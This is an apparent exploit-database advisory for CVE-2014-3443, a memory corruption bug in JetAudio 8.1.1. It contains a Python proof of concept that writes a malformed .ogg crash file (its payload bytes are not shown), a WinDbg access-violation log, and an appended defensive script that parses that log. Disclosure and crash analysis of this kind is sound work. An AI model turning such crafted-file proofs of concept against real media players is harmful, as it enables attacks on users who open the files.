
Jet Audio 8.1.1 Memory Corruption

Posted on 09 May 2014

# Exploit Title: [JetAudio memory corruption in latest Version 8.1.1 ]
# Date: [2014/05/08]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : [https://www.linkedin.com/profile/view?id=276969082]
# Vendor Homepage: [www.jetaudio.com]
# Software Link: [ http://fs31.filehippo.com/8445/45c502d892ec467993e62cfcfdba12f6/JAD8101_BASIC.exe ]
# Version: [Version 8.1.1 and prior to that]
# Tested on: [Windows Xp Sp 3 x86]
# Found by : Piece Dumb Fuzzer
# CVE : [2014-3443]

details:
JetAudio 8.1.1, the latest version, suffers from a memory corruption vulnerability triggered by a malformed .ogg file when JetMPAd.ax is loaded.

Poc:

#!/usr/bin/python
# Write the malformed .ogg test file to the current directory.
data = b"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"
with open("jetaudio-poc.ogg", "wb") as outfile:
    outfile.write(data)
print("Created Poc")

--------------------------------------------------------------------------------------------------------------------------

windbg result:

Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path. *
* Use .symfix to have the debugger choose a symbol path. *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is:
ModLoad: 00400000 00b9b000 C:\Program Files\JetAudio\JetAudio.exe
ModLoad: 7c900000 7c9af000 C:\WINDOWS\system32\ntdll.dll
ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll
ModLoad: 10000000 1000f000 C:\Program Files\JetAudio\JetCfg.dll
ModLoad: 00ba0000 00c7d000 C:\Program Files\JetAudio\jdl_ximage.dll
ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll
ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll
ModLoad: 78520000 785c3000 C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.4974_x-ww_d889290f\MSVCR90.dll
ModLoad: 78480000 7850e000 C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.4974_x-ww_d889290f\MSVCP90.dll
ModLoad: 003a0000 003e8000 C:\Program Files\JetAudio\jdl_exif.dll
ModLoad: 74ad0000 74ad8000 C:\WINDOWS\system32\POWRPROF.dll
ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e70000 77f02000 C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll
ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll
ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll
ModLoad: 789e0000 78d81000 C:\WINDOWS\WinSxS\x86_Microsoft.VC90.MFC_1fc8b3b9a1e18e3b_9.0.30729.4974_x-ww_a96f9c14\mfc90u.dll
ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\X86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\COMCTL32.dll
ModLoad: 76380000 76385000 C:\WINDOWS\system32\MSIMG32.dll
ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll
ModLoad: 774e0000 7761d000 C:\WINDOWS\system32\ole32.dll
ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll
ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\WINMM.dll
ModLoad: 771b0000 7725a000 C:\WINDOWS\system32\WININET.dll
ModLoad: 77a80000 77b15000 C:\WINDOWS\system32\CRYPT32.dll
ModLoad: 77b20000 77b32000 C:\WINDOWS\system32\MSASN1.dll
ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\VERSION.dll
ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL
ModLoad: 629c0000 629c9000 C:\WINDOWS\system32\LPK.DLL
ModLoad: 74d90000 74dfb000 C:\WINDOWS\system32\USP10.dll
ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\UxTheme.dll
ModLoad: 5d360000 5d36d000 C:\WINDOWS\WinSxS\x86_Microsoft.VC90.MFCLOC_1fc8b3b9a1e18e3b_9.0.30729.4974_x-ww_19f00fd4\MFC90ENU.DLL
ModLoad: 013f0000 01457000 C:\Program Files\JetAudio\JetCrash.dll
ModLoad: 73000000 73026000 C:\WINDOWS\system32\WINSPOOL.DRV
ModLoad: 02800000 028c1000 C:\Program Files\JetAudio\dbghelp.dll
ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll
ModLoad: 732e0000 732e5000 C:\WINDOWS\system32\RICHED32.DLL
ModLoad: 74e30000 74e9d000 C:\WINDOWS\system32\RICHED20.dll
ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime
ModLoad: 76780000 76789000 C:\WINDOWS\system32\shfolder.dll
ModLoad: 01780000 0178b000 C:\Program Files\JetAudio\JFEFFB3D.DLL
ModLoad: 017b0000 017bb000 C:\Program Files\JetAudio\JFEFFBBE.DLL
ModLoad: 017e0000 017eb000 C:\Program Files\JetAudio\JFEFFDRC.DLL
ModLoad: 01810000 0181b000 C:\Program Files\JetAudio\JFEFFFX.DLL
ModLoad: 01960000 0196d000 C:\Program Files\JetAudio\JFEFFRVB.DLL
ModLoad: 01990000 0199b000 C:\Program Files\JetAudio\JFEFFWID.DLL
ModLoad: 019c0000 019cc000 C:\Program Files\JetAudio\JFEFFXB.DLL
ModLoad: 019f0000 019fe000 C:\Program Files\JetAudio\JFEFFEQ.DLL
ModLoad: 01aa0000 01b23000 C:\Program Files\JetAudio\JFEXRMC.DLL
ModLoad: 76c30000 76c5e000 C:\WINDOWS\system32\WINTRUST.dll
ModLoad: 76c90000 76cb8000 C:\WINDOWS\system32\IMAGEHLP.dll
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv
ModLoad: 72d10000 72d18000 C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll
ModLoad: 76f50000 76f58000 C:\WINDOWS\system32\wtsapi32.dll
ModLoad: 76360000 76370000 C:\WINDOWS\system32\WINSTA.dll
ModLoad: 5b860000 5b8b5000 C:\WINDOWS\system32\NETAPI32.dll
ModLoad: 02370000 02387000 C:\Program Files\JetAudio\JXCDMan.dll
ModLoad: 028d0000 02b95000 C:\WINDOWS\system32\xpsp2res.dll
ModLoad: 02610000 02618000 C:\Program Files\Internet Download Manager\idmmkb.dll
ModLoad: 03280000 03288000 C:\Program Files\JetAudio\jdl_vorbisfile.dll
ModLoad: 03290000 03296000 C:\Program Files\JetAudio\jdl_ogg.dll
ModLoad: 03a80000 03c0c000 C:\Program Files\JetAudio\jdl_vorbis.dll
ModLoad: 031a0000 03230000 C:\Program Files\JetAudio\JXVidInfo.dll
ModLoad: 75a70000 75a91000 C:\WINDOWS\system32\MSVFW32.dll
ModLoad: 71ad0000 71ad9000 C:\WINDOWS\system32\wsock32.dll
ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 76fd0000 7704f000 C:\WINDOWS\system32\CLBCATQ.DLL
ModLoad: 77050000 77115000 C:\WINDOWS\system32\COMRes.dll
ModLoad: 74810000 7497d000 C:\WINDOWS\system32\quartz.dll
ModLoad: 73f10000 73f6c000 C:\WINDOWS\system32\dsound.dll
ModLoad: 73ee0000 73ee4000 C:\WINDOWS\system32\KsUser.dll
ModLoad: 7d790000 7d99b000 C:\WINDOWS\system32\wmvcore.dll
ModLoad: 03dc0000 03e0f000 C:\WINDOWS\system32\DRMClien.DLL
ModLoad: 736b0000 736b7000 C:\WINDOWS\system32\msdmo.dll
ModLoad: 7e1e0000 7e282000 C:\WINDOWS\system32\urlmon.dll
ModLoad: 59a10000 59a4c000 C:\WINDOWS\system32\WMASF.DLL
ModLoad: 4b320000 4b349000 C:\WINDOWS\system32\wmidx.dll
ModLoad: 75cf0000 75d81000 C:\WINDOWS\system32\mlang.dll
ModLoad: 75f40000 75f51000 C:\WINDOWS\system32\devenum.dll
ModLoad: 03f30000 03f90000 C:\Program Files\Common Files\COWON\JetOGM.ax
ModLoad: 03fe0000 0403b000 C:\Program Files\Common Files\COWON\JetAVI.ax
ModLoad: 04440000 044b1000 C:\Program Files\Common Files\COWON\JetMKV.ax
ModLoad: 045c0000 0465c000 C:\Program Files\Common Files\COWON\JetMP4.ax
ModLoad: 04790000 047f7000 C:\Program Files\Common Files\COWON\JetMPG.ax
ModLoad: 04930000 0498c000 C:\Program Files\Common Files\COWON\JetFLV.ax
ModLoad: 590b0000 590ce000 C:\WINDOWS\system32\wmpasf.dll
ModLoad: 71b20000 71b32000 C:\WINDOWS\system32\MPR.dll
ModLoad: 6bf50000 6bfcd000 C:\WINDOWS\system32\dxmasf.dll
ModLoad: 57fd0000 57ff7000 C:\WINDOWS\system32\mpg2splt.ax
ModLoad: 04ad0000 04c2b000 C:\Program Files\Common Files\COWON\JetMPAd.ax
(cd0.6cc): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll -
eax=7ffd9000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
eip=7c90120e esp=0332ffcc ebp=0332fff4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
ntdll!DbgBreakPoint:
7c90120e cc int 3
0:011> g
ModLoad: 03d10000 03d32000 C:\Program Files\JetAudio\JFAUDFP.DLL
ModLoad: 03d40000 03d52000 C:\Program Files\JetAudio\JFOGGRD.DLL
ModLoad: 03d80000 03d97000 C:\Program Files\JetAudio\JFWAVOUT.DLL
ModLoad: 03ed0000 03ed9000 C:\Program Files\JetAudio\JXOGGDec.dll
ModLoad: 03d10000 03da4000 C:\Program Files\JetAudio\JFDSPL.DLL
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
(cd0.244): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00002620 ebx=04c40000 ecx=7ffdf000 edx=04c40608 esi=04c3db60 edi=04c40180
eip=7c9106f7 esp=0012cb58 ebp=0012cb64 iopl=0 nv up ei ng nz na po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210283
ntdll!wcsncpy+0x198:
7c9106f7 f6460501 test byte ptr [esi+5],1 ds:0023:04c3db65=??
0:000> .load winext/msec.dll
0:000> !exploitable
!exploitable 1.6.0.0
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Common Files\COWON\JetMPAd.ax -
Exploitability Classification: UNKNOWN
Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at ntdll!wcsncpy+0x0000000000000198 (Hash=0x9a4f2dee.0x9c6d098e)

The data from the faulting address is later used to determine whether or not a branch is taken.
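
A triage check for the access-violation block in the WinDbg log above, as an added example that is not part of the original advisory: it recomputes the faulting operand address from the register dump, confirms the operand was unreadable, and flags that the function name was resolved from export symbols only. The helper name `triage` and the regular expressions are assumptions of this example; the log excerpt is copied from the page with path backslashes restored.

```python
import re

# Access-violation block copied from the WinDbg log on this page
# (backslashes in the module path restored).
CRASH_LOG = r"""*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll -
(cd0.244): Access violation - code c0000005 (first chance)
eax=00002620 ebx=04c40000 ecx=7ffdf000 edx=04c40608 esi=04c3db60 edi=04c40180
eip=7c9106f7 esp=0012cb58 ebp=0012cb64 iopl=0 nv up ei ng nz na po cy
ntdll!wcsncpy+0x198:
7c9106f7 f6460501 test byte ptr [esi+5],1 ds:0023:04c3db65=??
"""

REG_RE = re.compile(r"\b(eax|ebx|ecx|edx|esi|edi|eip|esp|ebp)=([0-9a-f]{8})\b")
EXC_RE = re.compile(r"Access violation - code ([0-9a-f]{8}) \((first|second) chance\)")
SYM_RE = re.compile(r"^(\w+)!(\w+)\+0x([0-9a-f]+):$", re.M)
# Faulting instruction line: address, opcode bytes, mnemonic, a [reg+disp]
# operand, then the segment:selector:address=value annotation.
INS_RE = re.compile(
    r"^([0-9a-f]{8}) [0-9a-f]+\s+(\w+)\s+.*?\[(\w+)([+-])([0-9a-f]+)h?\].*?"
    r"\w\w:[0-9a-f]{4}:([0-9a-f]{8})=(\S+)$", re.M)


def triage(log):
    """Summarise one x86 WinDbg access-violation block (hypothetical helper)."""
    regs = {name: int(val, 16) for name, val in REG_RE.findall(log)}
    exc, sym, ins = EXC_RE.search(log), SYM_RE.search(log), INS_RE.search(log)
    if not (exc and sym and ins):
        raise ValueError("no complete access-violation block found")
    addr, mnemonic, base, sign, disp, reported, value = ins.groups()
    offset = int(disp, 16) if sign == "+" else -int(disp, 16)
    computed = (regs[base] + offset) & 0xFFFFFFFF
    module = sym.group(1)
    return {
        "exception_code": exc.group(1),
        "eip_matches_registers": int(addr, 16) == regs["eip"],
        "instruction": mnemonic,
        "effective_address": computed,
        "address_matches_log": computed == int(reported, 16),
        # WinDbg prints ?? when it cannot read the operand's memory.
        "operand_unreadable": set(value) == {"?"},
        "symbol": f"{module}!{sym.group(2)}+0x{sym.group(3)}",
        # With export symbols only, the name is the nearest export below the
        # address, not a confirmed function.
        "symbol_from_exports_only": bool(re.search(
            rf"Defaulted to export symbols for .*\\{module}\.dll", log, re.I)),
    }


if __name__ == "__main__":
    print(triage(CRASH_LOG))
```

Because the log was captured without a symbol path, `ntdll!wcsncpy+0x198` should be read as "0x198 bytes past the nearest export", so re-running the debugger after `.symfix` and `.reload` is the next step before attributing the fault to a specific routine.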

 
